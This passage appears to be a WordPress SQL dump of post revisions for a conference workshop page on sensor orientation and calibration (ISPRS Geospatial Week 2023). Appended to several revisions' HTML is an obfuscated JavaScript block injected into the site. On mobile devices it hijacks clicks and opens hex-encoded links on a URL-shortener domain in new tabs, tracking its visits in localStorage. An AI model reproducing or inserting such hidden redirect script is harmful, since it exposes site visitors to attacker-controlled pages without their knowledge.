_0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2022-11-09 22:46:44','2022-11-09 22:46:44','',3266,'https://gsw2023.com/?p=3270',0,'revision','',0),
(3271,1,'2022-11-09 22:50:01','2022-11-09 22:50:01','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"59\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>State-of-the-art in orientation approaches of multi-sensor systems</strong></li>\n<li><strong>New calibration methods of mobile mapping platforms and systems for mapping and navigation purposes</strong></li>\n<li><strong>Challenges in aerial sensors calibration and orientation</strong></li>\n<li><strong>Testing new sensors and systems available in the market using the field-based and laboratory approaches</strong></li>\n<li><strong>Validation of satellite sensors in spectral and spatial quality, including testing micro- and nanosatellites</strong></li>\n<li><strong>Concepts of test fields for calibration of sensors, including the possibilities for aerial, low-altitude and terrestrial sensors</strong></li>\n<li><strong>New validation methods and case studies of photogrammetric and lidar sensors mainly referred to low-cost devices (i.e. hand scanners, smartphones)</strong></li>\n<li><strong>Sensors benchmarking – concepts and examples</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: (to be announced)</u></strong></h5>\n<ul>\n<li><strong>Khrystyna Burshtynska, Lviv Polytechnic National University, Ukraine</strong></li>\n<li><strong>Michael Cramer, University of Stuttgart, Germany</strong></li>\n<li><strong>Dorota Iwaszczuk, Technical University of Darmstadt, Germany</strong></li>\n<li><strong>Zdzisław Kurczyński, Warsaw University of Technology, Poland</strong></li>\n<li><strong>Jon Mills, Newcastle University, United Kingdom</strong></li>\n<li><strong>Fabio Remondino, Bruno Kessler Foundation FBK, Italy</strong></li>\n<li><strong>Jan Skaloud, Swiss Federal Institute of Technology EPFL, Switzerland</strong></li>\n<li><strong>Guo Zhang, Wuhan University, China</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2022-11-09 22:50:01','2022-11-09 22:50:01','',3266,'https://gsw2023.com/?p=3271',0,'revision','',0),
(3272,1,'2022-11-09 22:51:01','2022-11-09 22:51:01','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3267\" img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"59\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the event:</u></strong></h5>\n<ul>\n<li><strong>State-of-the-art in orientation approaches of multi-sensor systems</strong></li>\n<li><strong>New calibration methods of mobile mapping platforms and systems for mapping and navigation purposes</strong></li>\n<li><strong>Challenges in aerial sensors calibration and orientation</strong></li>\n<li><strong>Testing new sensors and systems available in the market using the field-based and laboratory approaches</strong></li>\n<li><strong>Validation of satellite sensors in spectral and spatial quality, including testing micro- and nanosatellites</strong></li>\n<li><strong>Concepts of test fields for calibration of sensors, including the possibilities for aerial, low-altitude and terrestrial sensors</strong></li>\n<li><strong>New validation methods and case studies of photogrammetric and lidar sensors mainly referred to low-cost devices (i.e. hand scanners, smartphones)</strong></li>\n<li><strong>Sensors benchmarking – concepts and examples</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee: (to be announced)</u></strong></h5>\n<ul>\n<li><strong>Khrystyna Burshtynska, Lviv Polytechnic National University, 